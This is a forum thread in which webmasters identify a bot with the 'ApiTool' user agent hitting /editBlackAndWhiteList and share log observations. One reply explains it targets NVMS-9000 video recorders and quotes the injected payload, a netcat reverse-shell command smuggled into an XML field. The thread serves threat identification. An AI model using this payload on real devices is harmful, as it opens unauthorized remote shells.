Welcome to WebmasterWorld Guest from 3.81.29.226

Forum Moderators: Ocean10000

ApiTool

     
7:23 am on Oct 7, 2019 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2067
votes: 2


UA: ApiTool
URI: /editBlackAndWhiteList
Request Method: POST
ISPs: Mexico: axtel.net; San Jose, CA: spectrum.com

Info: Loads of "API Tool"-related search results so "ApiTool" could be anything from an exploit to a blooper -- but POST and the URI suggest exploit. No clue about the URI either, sorry. First seen yesterday and only twice.
10:19 pm on Oct 24, 2019 (gmt 0)

New User

joined:Oct 24, 2019
posts:1
votes: 0


exploit, looking for NVMS-9000-series no-name PVR type network-attached devices. payload contains the following shellcode in an attempt to gain root shell of the device ( ${IFS} replaced with spaces for clarity ).
<ip>$(nc xx.xxx.xx.xxx 31337 -e $SHELL&)</ip>

IP address in the shellcode is usually differenf from the originating IP, suggesting there's more than a rookie scripkiddie behind this.

[edited by: engine at 11:27 am (utc) on Oct 26, 2019]
[edit reason] obfuscated ip [/edit]

11:51 pm on Oct 24, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:10563
votes: 1123


@honeyandpot (kewl moniker!) Welcome to Webmasterworld!

The bad actors are everywhere and we need to stay alert!
5:52 am on Oct 26, 2019 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2067
votes: 2


Thanks for confirmation and info, and welcome, honeyandpot! I'm seeing this exploit three to four times a day now, always the exact same UA/URI/Request Method. A sprinkling of US IPs but most are elsewhere.
4:37 pm on Oct 26, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:15934
votes: 887


I'm seeing this exploit three to four times a day now
Every time I read about a robot that I've never set eyes on, I get to wondering what triggers its arrival. Obviously not something basic like the presence of some standard CMS, since that kind of thing gets requested regardless. (Business with search engine tells me that around 1/3 of all websites [w3techs.com] use WP--though it certainly doesn't follow that 1/3 of all web traffic is to WP pages.)

Cursory research suggests that it really is a new robot, since everything with a visible date is from this month. (Cursory research also reveals that a heck of a lot of people's access logs somehow ended up in crawlable and hence indexable locations, suggesting a major ineptitude on the part of one or more hosts.) It doesn't look as if the URL is associated with any well-known CMS, so where are they getting it from? With different casing, it's the contact address for at least one British newspaper, but that's probably a red herring unless something sneaked into a script by mistake.
4:12 am on Oct 27, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:10563
votes: 1123


Heh ... api can also be bogus "application program interface". (wink wink nudge nudge)